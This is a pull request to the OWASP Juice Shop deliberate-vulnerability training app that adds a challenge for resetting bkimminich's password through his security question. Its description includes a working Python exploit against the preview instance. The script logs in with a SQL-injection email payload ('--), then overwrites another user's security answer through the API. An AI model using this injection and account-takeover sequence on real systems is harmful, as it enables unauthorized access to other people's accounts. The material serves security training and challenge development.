### PR TITLE
Add resetPasswordBkimminichChallenge

### DIFF
--- a/config/fbctf.yml
+++ b/config/fbctf.yml
@@ -315,3 +315,6 @@ ctf:
     lfrChallenge:
       name: Ireland
       code: IE
+    resetPasswordBkimminichChallenge:
+      name: Norway
+      code: No

--- a/data/static/challenges.yml
+++ b/data/static/challenges.yml
@@ -702,6 +702,17 @@
   mitigationUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html'
   key: resetPasswordBenderChallenge
 -
+  name: 'Reset bkimminich''s Password'
+  category: 'Broken Access Control'
+  tags:
+    - Good Practice
+  description: 'Reset bkimminich''s password via the <a href="/#/forgot-password">Forgot Password</a> mechanism with <i>your answer</i> to his security question.'
+  difficulty: 2
+  hint: 'Do not wait for someone else to make questions on behalf of you.'
+  hintUrl: 'https://pwning.owasp-juice.shop/part2/broken-anti-automation.html#reset-bkimminich-password-via-the-forgot-password-mechanism'
+  mitigationUrl: 'https://cheatsheetseries.owasp.org/cheatsheets/Choosing_and_Using_Security_Questions_Cheat_Sheet.html'
+  key: resetPasswordBkimminichChallenge
+-
   name: 'Reset Bjoern''s Password'
   category: 'Broken Authentication'
   tags:

--- a/routes/resetPassword.ts
+++ b/routes/resetPassword.ts
@@ -57,6 +57,7 @@ function verifySecurityAnswerChallenges (user, answer) {
   utils.solveIf(challenges.resetPasswordMortyChallenge, () => { return user.id === users.morty.id && answer === '5N0wb41L' })
   utils.solveIf(challenges.resetPasswordBjoernOwaspChallenge, () => { return user.id === users.bjoernOwasp.id && answer === 'Zaya' })
   utils.solveIf(challenges.resetPasswordUvoginChallenge, () => { return user.id === users.uvogin.id && answer === 'Silence of the Lambs' })
+  utils.solveIf(challenges.resetPasswordBkimminichChallenge, () => { return user.id === users.bjoernGoogle.id })
   utils.solveIf(challenges.geoStalkingMetaChallenge, () => {
     const securityAnswer = ((() => {
       const memories = config.get('memories')


### PR DESCRIPTION
Fixes #1634 
I have tested on my local machine and the challenge will be solved once the player successfully reset password of `bjoern.kimminich@gmail.com`. You can try to find false positives.
To pass the `CountryMapping` test, I append the new challenge to `fbctf.yml` and choose Norway to be the country arbitrarily.

You can use the code below to set the security Q&A for `bjoern.kimminich@gmail.com` straight and click on `forgot password` to finish the last step.

```python
import requests
import json


BASE = 'http://preview.owasp-juice.shop/'


def login():
    sess = requests.Session()
    form = {'email': "bender@juice-sh.op'--", 'password': "a"}
    r = sess.post(BASE + 'rest/user/login', data=form)
    print(r.text)
    res = json.loads(r.text)
    token = res['authentication']['token']
    hd = {'Authorization': 'Bearer ' + token}  # , 'Cookie': cookies}
    sess.headers.update(hd)
    return sess


def get_users(sess=None):
    sess = sess or requests.Session()
    r = sess.get(BASE + 'api/Users')
    print(r.text)
    return sess


def get_questions(sess=None):
    sess = sess or requests.Session()
    r = sess.get(BASE + 'api/SecurityQuestions')
    print(r.text)
    return sess


def set_anwser(sess=None, uid=4, qid=10):
    sess = sess or requests.Session()
    form = {
            'UserId': uid,
            'SecurityQuestionId': qid,
            'answer': 'OWASP'
        }
    r = sess.post(BASE + 'api/SecurityAnswers', data=form)
    print(r.text)
    return sess


if __name__ == '__main__':
    sess = login()
    get_users(sess)
    set_anwser(sess)
```